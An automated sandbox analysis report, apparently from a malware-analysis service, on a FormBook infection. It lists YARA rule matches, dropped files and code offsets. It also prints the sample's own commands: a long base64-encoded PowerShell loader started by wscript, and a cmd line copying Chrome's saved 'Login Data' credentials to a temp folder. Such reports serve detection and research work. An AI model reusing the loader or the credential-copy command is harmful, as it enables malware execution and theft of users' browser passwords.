      Source: Yara matchFile source: 00000007.00000002.25335440666.00000000000B0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
      Source: Yara matchFile source: 00000007.00000002.25360788645.000000001E2D0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
      Source: Yara matchFile source: 0000000A.00000002.28728388128.00000000009B0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
      Source: Yara matchFile source: 0000000A.00000002.28715888859.0000000000410000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
      Source: Yara matchFile source: 00000008.00000000.25252205089.000000000B25C000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
      Source: Yara matchFile source: 0000000A.00000002.28728099241.0000000000980000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY

      System Summary

      barindex
      Detected FormBook malware
      Source: C:\Windows\SysWOW64\wscript.exeDropped file: C:\Users\user\AppData\Roaming\O228O718\O22logrv.iniJump to dropped file
      Source: C:\Windows\SysWOW64\wscript.exeDropped file: C:\Users\user\AppData\Roaming\O228O718\O22logri.iniJump to dropped file
      Source: C:\Program Files\Mozilla Firefox\firefox.exeDropped file: C:\Users\user\AppData\Roaming\O228O718\O22logrf.iniJump to dropped file
      Malicious sample detected (through community Yara rule)
      Source: 00000008.00000000.25108590881.000000000B25C000.00000040.00000001.00040000.00000000.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
      Source: 00000008.00000000.25108590881.000000000B25C000.00000040.00000001.00040000.00000000.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
      Source: 00000008.00000000.25108590881.000000000B25C000.00000040.00000001.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
      Source: 00000007.00000002.25335440666.00000000000B0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
      Source: 00000007.00000002.25335440666.00000000000B0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
      Source: 00000007.00000002.25335440666.00000000000B0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
      Source: 00000007.00000002.25360788645.000000001E2D0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
      Source: 00000007.00000002.25360788645.000000001E2D0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
      Source: 00000007.00000002.25360788645.000000001E2D0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
      Source: 0000000A.00000002.28728388128.00000000009B0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
      Source: 0000000A.00000002.28728388128.00000000009B0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
      Source: 0000000A.00000002.28728388128.00000000009B0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
      Source: 0000000A.00000002.28715888859.0000000000410000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
      Source: 0000000A.00000002.28715888859.0000000000410000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
      Source: 0000000A.00000002.28715888859.0000000000410000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
      Source: 00000008.00000000.25252205089.000000000B25C000.00000040.00000001.00040000.00000000.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
      Source: 00000008.00000000.25252205089.000000000B25C000.00000040.00000001.00040000.00000000.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
      Source: 00000008.00000000.25252205089.000000000B25C000.00000040.00000001.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
      Source: 0000000A.00000002.28728099241.0000000000980000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
      Source: 0000000A.00000002.28728099241.0000000000980000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
      Source: 0000000A.00000002.28728099241.0000000000980000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
      Source: Process Memory Space: ieinstal.exe PID: 5932, type: MEMORYSTRMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
      Source: Process Memory Space: wscript.exe PID: 7244, type: MEMORYSTRMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
      Wscript starts Powershell (via cmd or directly)
      Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "IwBOAGEAdAB1AHIAZgBhAGcAZQBuACAAVAByAG8AcABoAG8AbgB1AGMAIABBAGMAaABvAG4AZAAgAEwAdQBmAHQAawB2AGEAbABpAHQAIABDAHkAYwBsACAAdABlAHQAYwBoAGUAZAB1AGQAIABQAGEAcgBhACAAUwB1AHAAcABsAGUAIABTAHUAYgB0AGkAdABsAGUAIABBAGMAYwBlAHMAcwAgAFAAYQByAGEAbAAgAE8AdgBlAHIAcABvAG4AIABnAHkAbgBlACAAUgBlAGQAZQBmAGkAbgBlACAATQBhAHQAZQByAGkAIABDAGgAYQBpAG4AbQBhAGsAaQBuACAAcwBwAGkAcgB1ACAATABlAHYAZQAgAHcAZQBmAHQAYQBnACAARgBvAHIAcwB5AG4AaQBuAGcAcwAgAEkAbgBkAHMAawB5AGQAbgBpAG4AIABUAHIAYQBuAG0AaQAgAFMAawByAGEAdgBlAHIAaQBuACAAVAB1AHIAbgAgAE0AYQBzAGsAaQBuACAAVABzAHQAcwBjAG8AIABBAHMAcwB1AG0AaQBuAGcAbAB5ACAATgBhAHQAdABlAHYAYQBuAGQAcgAgAFMAawBpAGwAIAANAAoAIwBBAGsAaQBuAGUAdABlAHQAZQAgAFUAbgBlAHgAcAAgAHAAaABvAHMAcABoAG8AcgAgAEYAbwByAGIAIABVAG4AYwBvAG4AdABpACAAUABsAGEAdAAgAEYAdQBuAGQAIABDAG8AbgBmAHUAYwBpAGEAbgAgAE0AZQBkAGEAbABqAGUAdgBpACAAUwBwAG8AcgBzAHQAIABEAGkAbwByAGEAbQBhAHMAawBuACAADQAKACMAQQBtAG4AaQAgAEwAbwB2AHIAZQB2AGkAcwBpAG8AIABoAGEAcgB0AGEAbAByAGUAZQAgAEsAbABiAHYAaQB0AHIAIABTAHQAZQBuAG8AYwBoAHIAIABTAGsAbwB2AHMAcAB1AHIAdgBlACAAQwBoAG8AbgBkAHIAbwAgAEgAdQBkAGcAZQBuACAAUAByAHUAdAB0AGUAbgByACAATQB5AHQAaABpAHMAZQAgAE8AbQBrAHIAcwAgAEEAcQB1AGkAYwB1AGwAdAAgAA0ACgAkAE0AYQBzAHQAZQByAE0AaQBuAGQAIAA9ACAAWwBjAGgAYQByAF0AMwA0ACAAKwAgACIATgAiACAAKwAgACIAdABBAGwAIgAgACsAIAAiAGwAbwBjACIAIAArACAAIgBhAHQAZQAiACsAIgBWAGkAIgAgACsAIAAiAHIAdAB1AGEAbAAiACAAKwAgACIATQBlAG0AbwByAHkAIgAgACsAIABbAGMAaABhAHIAXQAzADQADQAKAA0ACgAjAEUAbgBnAHIAbwBvAHYAZQAgAG0AZQBnAGEAbAAgAE4AbwBuAGYAIABUAHUAbgBpAG4AZwBzACAAUwBqAGwAZQBnAGwAYQBkAGwAaQAgAFMAYQBuAGsAdAAgAFAAYQBtAHAAZQByACAAUAByAGUAZABpAHMAcABhACAARQBwAGgAZQAgAEEAcgBtAGEAIABEAGUAaABvAHIAbgBpAG4AIABHAG8AcwBzAGkAcAAgAEIAdQBzAHQAbABlAHIAcwAgAE8AYgBpAHMAcABhAG4AdAAgAE4AbwBuAHAAYQBjAGkAIABBAHAAcABsAGkAYwBlAHIAIABGAGkAZABvAHMAdABlAHIAIABMAGkAbgBqACAASABvAG0AaQBjAHUAbAAgAFQAdgBpAHYAbAByAGEAYQAgAEIAaQBkAHIAYQAgAHUAZwBlAG4AcABvAGwAcwB0ACAAUwBrAGUAbQBhAGYAbwByAG0AIABIAGEAbAB2AGEAYgBlAG4AcAAgAEwAeQBzAGkAIABhAGwAdABlAHIAYwBhACAAWQBhAGwAZQBsAGEAYQBzAGIAbAAgAEUAbgBkAG8AZwBzAGEAYQBmAG8AIABDAGEAbABjAGkAbwBmAGUAcgAgAEoAbwBiAGIAZQBzAGsAcgBpACAAVABvAHIAZQByAGUAZQByAHUAIABSAGUAdAB0ACAAUABlAHIAbAAgAA0ACgAjAFUAZABzAGsAIABLAGEAdABhAHMAdAByAG8AZgBlACAASAB5AHAAZQByAG0AIABTAGsAeQB0AHMAaAAgAEEAZgB0AGEAbAB0ACAASABhAHYAZQAgAEIAdQB0AHQAZQByAGQAZQBqAHMAIABGAHIAYgBhACAAQwBhAHQAbwBwAHQAIABJAGcAbgBvAHIAYQBuAGMAZQAgAE8AdQB0AGIAdQBsACAATQBlAGwAYgBvAHUAIABNAGkAcwB0AGkAIABTAG0AZABlACAAVQBuAGwAbwBkACAATwB2AGUAbgAgAFIAZQBvAGIAcwBlACAATwBwAGIAcgAgAEIAcgBkAGQAZQBnACAASAB5AGQAYQB0AGkAZABvAGMAZQAgAEQAZQBuAHQAaQBmAHIAaQBjAGUAIABBAGMAcgBvACAASQBuAGUAeABwACAAUwBlAGsAcwBrACAAVQBuAGQAZQAgAEgAeQBwAGUAIABHAGkAZgB0AGUAawBuAGkAIABPAG0AZABvAGUAYgAgAFMAawBhAGUAcgBtACAATgBpAG4AZQB0AGUAZAB1ACAARQBkAGkAdABlACAATwBtAGsAbwBzAHQAIABTAGwAZABlAHIAcwAgAA0ACgAjAEQAZQBnAGUAbgBlAHIAIABIAHkAcABlAHIAaABpAGQAIABBAGwAZgBnAHkAcABzACAAUgBpAGIAYQB6AHUAYgBhAGkAbgAgAEQAYQB5AGQAYQB3AG4AIABQAHIAYQBzACAAUwB1AGIAYw
      Source: C:\Windows\SysWOW64\wscript.exeProcess created: C:\Windows\SysWOW64\cmd.exe /c copy "C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data" "C:\Users\user\AppData\Local\Temp\DB1" /V
      Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "IwBOAGEAdAB1AHIAZgBhAGcAZQBuACAAVAByAG8AcABoAG8AbgB1AGMAIABBAGMAaABvAG4AZAAgAEwAdQBmAHQAawB2AGEAbABpAHQAIABDAHkAYwBsACAAdABlAHQAYwBoAGUAZAB1AGQAIABQAGEAcgBhACAAUwB1AHAAcABsAGUAIABTAHUAYgB0AGkAdABsAGUAIABBAGMAYwBlAHMAcwAgAFAAYQByAGEAbAAgAE8AdgBlAHIAcABvAG4AIABnAHkAbgBlACAAUgBlAGQAZQBmAGkAbgBlACAATQBhAHQAZQByAGkAIABDAGgAYQBpAG4AbQBhAGsAaQBuACAAcwBwAGkAcgB1ACAATABlAHYAZQAgAHcAZQBmAHQAYQBnACAARgBvAHIAcwB5AG4AaQBuAGcAcwAgAEkAbgBkAHMAawB5AGQAbgBpAG4AIABUAHIAYQBuAG0AaQAgAFMAawByAGEAdgBlAHIAaQBuACAAVAB1AHIAbgAgAE0AYQBzAGsAaQBuACAAVABzAHQAcwBjAG8AIABBAHMAcwB1AG0AaQBuAGcAbAB5ACAATgBhAHQAdABlAHYAYQBuAGQAcgAgAFMAawBpAGwAIAANAAoAIwBBAGsAaQBuAGUAdABlAHQAZQAgAFUAbgBlAHgAcAAgAHAAaABvAHMAcABoAG8AcgAgAEYAbwByAGIAIABVAG4AYwBvAG4AdABpACAAUABsAGEAdAAgAEYAdQBuAGQAIABDAG8AbgBmAHUAYwBpAGEAbgAgAE0AZQBkAGEAbABqAGUAdgBpACAAUwBwAG8AcgBzAHQAIABEAGkAbwByAGEAbQBhAHMAawBuACAADQAKACMAQQBtAG4AaQAgAEwAbwB2AHIAZQB2AGkAcwBpAG8AIABoAGEAcgB0AGEAbAByAGUAZQAgAEsAbABiAHYAaQB0AHIAIABTAHQAZQBuAG8AYwBoAHIAIABTAGsAbwB2AHMAcAB1AHIAdgBlACAAQwBoAG8AbgBkAHIAbwAgAEgAdQBkAGcAZQBuACAAUAByAHUAdAB0AGUAbgByACAATQB5AHQAaABpAHMAZQAgAE8AbQBrAHIAcwAgAEEAcQB1AGkAYwB1AGwAdAAgAA0ACgAkAE0AYQBzAHQAZQByAE0AaQBuAGQAIAA9ACAAWwBjAGgAYQByAF0AMwA0ACAAKwAgACIATgAiACAAKwAgACIAdABBAGwAIgAgACsAIAAiAGwAbwBjACIAIAArACAAIgBhAHQAZQAiACsAIgBWAGkAIgAgACsAIAAiAHIAdAB1AGEAbAAiACAAKwAgACIATQBlAG0AbwByAHkAIgAgACsAIABbAGMAaABhAHIAXQAzADQADQAKAA0ACgAjAEUAbgBnAHIAbwBvAHYAZQAgAG0AZQBnAGEAbAAgAE4AbwBuAGYAIABUAHUAbgBpAG4AZwBzACAAUwBqAGwAZQBnAGwAYQBkAGwAaQAgAFMAYQBuAGsAdAAgAFAAYQBtAHAAZQByACAAUAByAGUAZABpAHMAcABhACAARQBwAGgAZQAgAEEAcgBtAGEAIABEAGUAaABvAHIAbgBpAG4AIABHAG8AcwBzAGkAcAAgAEIAdQBzAHQAbABlAHIAcwAgAE8AYgBpAHMAcABhAG4AdAAgAE4AbwBuAHAAYQBjAGkAIABBAHAAcABsAGkAYwBlAHIAIABGAGkAZABvAHMAdABlAHIAIABMAGkAbgBqACAASABvAG0AaQBjAHUAbAAgAFQAdgBpAHYAbAByAGEAYQAgAEIAaQBkAHIAYQAgAHUAZwBlAG4AcABvAGwAcwB0ACAAUwBrAGUAbQBhAGYAbwByAG0AIABIAGEAbAB2AGEAYgBlAG4AcAAgAEwAeQBzAGkAIABhAGwAdABlAHIAYwBhACAAWQBhAGwAZQBsAGEAYQBzAGIAbAAgAEUAbgBkAG8AZwBzAGEAYQBmAG8AIABDAGEAbABjAGkAbwBmAGUAcgAgAEoAbwBiAGIAZQBzAGsAcgBpACAAVABvAHIAZQByAGUAZQByAHUAIABSAGUAdAB0ACAAUABlAHIAbAAgAA0ACgAjAFUAZABzAGsAIABLAGEAdABhAHMAdAByAG8AZgBlACAASAB5AHAAZQByAG0AIABTAGsAeQB0AHMAaAAgAEEAZgB0AGEAbAB0ACAASABhAHYAZQAgAEIAdQB0AHQAZQByAGQAZQBqAHMAIABGAHIAYgBhACAAQwBhAHQAbwBwAHQAIABJAGcAbgBvAHIAYQBuAGMAZQAgAE8AdQB0AGIAdQBsACAATQBlAGwAYgBvAHUAIABNAGkAcwB0AGkAIABTAG0AZABlACAAVQBuAGwAbwBkACAATwB2AGUAbgAgAFIAZQBvAGIAcwBlACAATwBwAGIAcgAgAEIAcgBkAGQAZQBnACAASAB5AGQAYQB0AGkAZABvAGMAZQAgAEQAZQBuAHQAaQBmAHIAaQBjAGUAIABBAGMAcgBvACAASQBuAGUAeABwACAAUwBlAGsAcwBrACAAVQBuAGQAZQAgAEgAeQBwAGUAIABHAGkAZgB0AGUAawBuAGkAIABPAG0AZABvAGUAYgAgAFMAawBhAGUAcgBtACAATgBpAG4AZQB0AGUAZAB1ACAARQBkAGkAdABlACAATwBtAGsAbwBzAHQAIABTAGwAZABlAHIAcwAgAA0ACgAjAEQAZQBnAGUAbgBlAHIAIABIAHkAcABlAHIAaABpAGQAIABBAGwAZgBnAHkAcABzACAAUgBpAGIAYQB6AHUAYgBhAGkAbgAgAEQAYQB5AGQAYQB3AG4AIABQAHIAYQBzACAAUwB1AGIAYwJump to behavior
      Source: C:\Windows\SysWOW64\wscript.exeProcess created: C:\Windows\SysWOW64\cmd.exe /c copy "C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data" "C:\Users\user\AppData\Local\Temp\DB1" /VJump to behavior
      Very long command line found
      Source: C:\Windows\System32\wscript.exeProcess created: Commandline size = 9656
      Source: C:\Windows\System32\wscript.exeProcess created: Commandline size = 9656Jump to behavior
      Source: 00000008.00000000.25108590881.000000000B25C000.00000040.00000001.00040000.00000000.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
      Source: 00000008.00000000.25108590881.000000000B25C000.00000040.00000001.00040000.00000000.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
      Source: 00000008.00000000.25108590881.000000000B25C000.00000040.00000001.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
      Source: 00000007.00000002.25335440666.00000000000B0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
      Source: 00000007.00000002.25335440666.00000000000B0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
      Source: 00000007.00000002.25335440666.00000000000B0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
      Source: 00000007.00000002.25360788645.000000001E2D0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
      Source: 00000007.00000002.25360788645.000000001E2D0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
      Source: 00000007.00000002.25360788645.000000001E2D0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
      Source: 0000000A.00000002.28728388128.00000000009B0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
      Source: 0000000A.00000002.28728388128.00000000009B0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
      Source: 0000000A.00000002.28728388128.00000000009B0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
      Source: 0000000A.00000002.28715888859.0000000000410000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
      Source: 0000000A.00000002.28715888859.0000000000410000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
      Source: 0000000A.00000002.28715888859.0000000000410000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
      Source: 00000008.00000000.25252205089.000000000B25C000.00000040.00000001.00040000.00000000.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
      Source: 00000008.00000000.25252205089.000000000B25C000.00000040.00000001.00040000.00000000.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
      Source: 00000008.00000000.25252205089.000000000B25C000.00000040.00000001.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
      Source: 0000000A.00000002.28728099241.0000000000980000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
      Source: 0000000A.00000002.28728099241.0000000000980000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
      Source: 0000000A.00000002.28728099241.0000000000980000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
      Source: Process Memory Space: ieinstal.exe PID: 5932, type: MEMORYSTRMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
      Source: Process Memory Space: wscript.exe PID: 7244, type: MEMORYSTRMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 3_2_04B2CD983_2_04B2CD98
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 3_2_04B2CD893_2_04B2CD89
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 3_2_081900403_2_08190040
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 3_2_081978083_2_08197808
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 3_2_081900403_2_08190040
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 3_2_083000403_2_08300040
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 3_2_0830003F3_2_0830003F
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 3_2_083096783_2_08309678
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 3_2_083096573_2_08309657
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 3_2_083D003B3_2_083D003B
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 3_2_083D00403_2_083D0040
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 3_2_083D52B03_2_083D52B0
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 3_2_083D52C03_2_083D52C0
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 3_2_087059083_2_08705908
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 3_2_087030183_2_08703018
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 3_2_0870300A3_2_0870300A
      Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exeCode function: 7_2_1E700E6D7_2_1E700E6D
      Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exeCode function: 7_2_1E6A2E487_2_1E6A2E48
      Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exeCode function: 7_2_1E680E507_2_1E680E50
      Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exeCode function: 7_2_1E652EE87_2_1E652EE8
      Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exeCode function: 7_2_1E719ED27_2_1E719ED2
      Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exeCode function: 7_2_1E661EB27_2_1E661EB2
